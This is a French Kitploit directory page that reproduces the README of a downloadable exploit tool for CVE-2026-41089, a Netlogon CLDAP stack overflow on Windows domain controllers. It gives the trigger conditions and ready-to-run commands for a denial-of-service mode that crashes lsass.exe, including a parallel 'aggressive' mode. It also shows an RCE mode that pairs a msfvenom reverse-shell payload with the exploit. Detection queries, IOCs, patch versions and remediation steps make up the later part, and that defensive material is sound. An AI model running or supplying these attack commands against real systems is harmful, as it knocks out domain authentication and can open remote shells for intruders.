Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41089 — CVE-2026-41089 est une vulnérabilité critique d'exécution de code à distance dans le service Windows Netlogon ; un seul paquet peut faire planter lsass.exe, provoquant le redémarrage du contrôleur de domaine en 30 à 60 secondes. Pendant cette période, toute authentification de domaine sur ce DC échouera. | Kitploit
Outils/GitHubGitHub/hnytgl/cve-2026-41089
Analyse des VulnérabilitésExploitationTests d'IntrusionOutil d'Accès à DistanceExploitation de Binaires
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Voir le dépôt
141223il y a 3 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2026-41089 est une vulnérabilité critique d'exécution de code à distance dans le service Windows Netlogon ; un seul paquet peut faire planter lsass.exe, provoquant le redémarrage du contrôleur de domaine en 30 à 60 secondes. Pendant cette période, toute authentification de domaine sur ce DC échouera.

Partager

CVE-2026-41089 — Exploit RCE par débordement de tampon de pile dans Windows Netlogon CLDAP

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critique)
CWE: CWE-121 (Débordement de tampon basé sur la pile)
Vecteur d'attaque: UDP/389 (CLDAP SearchRequest)
Impact: Exécution de code à distance (RCE) / Déni de service (DoS)
Versions affectées: Windows Server 2012 R2 ~ 2025 (Contrôleurs de domaine)
Correctif: Mise à jour cumulative de mai 2026

Aperçu de la vulnérabilité

La fonction NetpLogonPutUnicodeString dans netlogon.dll présente une vulnérabilité de débordement de tampon de pile lors du traitement des requêtes de recherche CLDAP. Cette fonction reçoit un budget de longueur en octets, mais l'interprète comme un nombre de WCHAR, ce qui entraîne une écriture 2 fois supérieure à celle attendue.

Le débordement se produit dans le tampon de pile fixe de 528 octets (264 ushort) de la fonction NlGetLocalPingResponse. Le champ User contrôlé par l'attaquant, combiné au nom de domaine DNS du serveur lui-même, remplit ce tampon, finissant par écraser le cookie de sécurité GS, provoquant __report_gsfailure et le crash de lsass.exe.

Conditions de déclenchement

  • NtVer=0x02 dans la requête CLDAP SearchRequest (force l'utilisation de l'ancien chemin vulnérable BuildSamLogonResponse)
  • Longueur du champ User ≥ ~130 caractères (limite binaire d'environ 260 octets UTF-16)
  • Longueur du nom de domaine DNS du serveur ≥ ~80 caractères (plus le nom de domaine est long, plus il est facile d'atteindre le cookie)

Remarque: NtVer=0x16 (valeur utilisée par de nombreux scripts de détection publics) déclenche le chemin sécurisé BuildSamLogonResponseEx et ne déclenche pas la vulnérabilité.

Fonctionnalités

ModeDescription
--mode dosEnvoie un paquet CLDAP soigneusement construit, provoquant le crash de LSASS et le redémarrage du DC (~60 secondes d'interruption d'authentification)
--mode rceTente une exécution de code à distance (niveau recherche, nécessite un shellcode)
--mode scanScanne les réponses pour différentes valeurs NtVer, effectue une empreinte du DC cible
--mode autoDétecte automatiquement et sélectionne la meilleure stratégie d'attaque

Mode DoS

Un seul paquet suffit à faire planter lsass.exe, provoquant le redémarrage du contrôleur de domaine en environ 30 à 60 secondes. Pendant cette période, toutes les authentifications de domaine sur ce DC échoueront.

# Utilisation de base — envoie 3 paquets
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Attaque rapide à paquet unique
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Mode agressif — 5 paquets en parallèle
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Mode RCE

⚠️ Niveau recherche — peu fiable et instable en environnement réel.

Le RCE fait face aux défis suivants :

  1. Les données de débordement sont le nom DNS du serveur lui-même, et non le shellcode de l'attaquant
  2. Le cookie GS doit être contourné (nécessite une primitive de fuite d'informations ou une attaque par force brute)
  3. CET/ACG/CFG sur Server 2022+ rendent le ROP traditionnel plus difficile
# Générer le shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Envoyer la chaîne RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Mode Scan

# Effectuer une empreinte du DC cible
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Exemple de sortie attendue (cible corrigée) :

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Exemple de sortie attendue (cible non corrigée) :

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Si NtVer=0x02 expire alors que les autres versions répondent normalement, la cible est très probablement vulnérable.

Paramètres avancés

ParamètreDescriptionValeur par défaut
-l, --user-lenLongueur du champ nom d'utilisateur (nombre de caractères ASCII)180
--ntverValeur NtVer (hexadécimal, ex. 0x02)0x02
--countNombre de paquets DoS envoyés3
--delayDélai entre les paquets (secondes)0.5
-t, --timeoutDélai d'expiration du socket (secondes)5.0
--jsonSortie des résultats au format JSON—
--rawAffiche le paquet brut en hexadécimal avant l'envoi—
--quietSupprime l'affichage de la bannière—
--shellcode-fileFichier shellcode personnalisé (x64 brut)—
--lhostAdresse d'écoute du reverse shell—
--lportPort d'écoute du reverse shell4444

Configuration de l'environnement de test

# Créer un DC avec un nom de domaine long sur Windows Server (non corrigé) :
# 1. Promouvoir en contrôleur de domaine (nom de domaine DNS très long, par exemple "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Vérifier que les correctifs antérieurs à mai 2026 sont installés
# 3. Exécuter depuis la machine attaquante :
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Observer le crash et le redémarrage du DC

Indicateurs de compromission (IOC)

Réseau

  • Requêtes CLDAP SearchRequest avec User > 100 octets et NtVer = 0x02 sur UDP/389
  • Trafic CLDAP anormal provenant d'hôtes non-contrôleurs de domaine vers un DC

Hôte

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Règles de détection

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Informations sur les correctifs

Version de Windows ServerNuméro de version corrigéeRemarques
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Guide de détection et de remédiation

Détection rapide (non destructive)

# Script de détection sécurisé — ne fait pas planter la cible
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# Sortie JSON (adaptée au scan par lots)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# Afficher les étapes de vérification du correctif
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

Principe de détection : envoie de courtes requêtes CLDAP avec NtVer=0x02 (déclenche le chemin vulnérable) et NtVer=0x16 (chemin sécurisé). Si 0x02 expire mais que 0x16 répond normalement, la cible est très probablement vulnérable.

Étapes de remédiation

  1. Installer immédiatement le correctif : mise à jour cumulative de mai 2026 (KB5058405 ou supérieur)
    # Vérifier les mises à jour installées
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # Installer la dernière mise à jour
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
Télécharger l’outil